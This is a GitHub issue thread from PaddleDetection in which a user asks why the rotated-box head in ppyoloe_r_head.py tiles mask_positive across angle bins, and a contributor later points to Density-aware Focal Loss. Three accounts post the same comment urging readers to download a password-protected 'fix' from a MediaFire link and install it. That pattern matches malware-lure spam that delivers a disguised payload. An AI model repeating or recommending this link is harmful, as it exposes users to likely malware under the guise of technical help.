### ISSUE TITLE
ppyoloer about the code question

### ISSUE THREAD

**Issue by dlwforever** [PaddlePaddle/PaddleDetection#9116]
### 问题确认 Search before asking

- [X] 我已经搜索过问题，但是没有找到解答。I have searched the question and found no related answer.

### 请提出你的问题 Please ask your question

在旋转目标检测的任务中，ppdet/modeling/heads/ppyoloe_r_head.py里面第371行-372行，对mask_positive增加维度之后又进行了tile的操作，相当于在最后一个维度复制了angle_max+1次，这个操作是为什么呢？不是太理解

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by dlwforever** [comment]
Is there anyone can answer my question?

**Comment by Sunting78** [comment]
可以看下Density-aware Focal Loss 。这个操作是为了将每个正样本（即与真实框匹配或满足某种正样本条件的预测框）与一系列离散化的角度类别相关联，以便能够计算每个正样本预测框在所有角度类别上的预测损失

**Comment by TingquanGao** [comment]
The issue has no response for a long time and will be closed. You can reopen or new another issue if are still confused.

---
_From Bot_
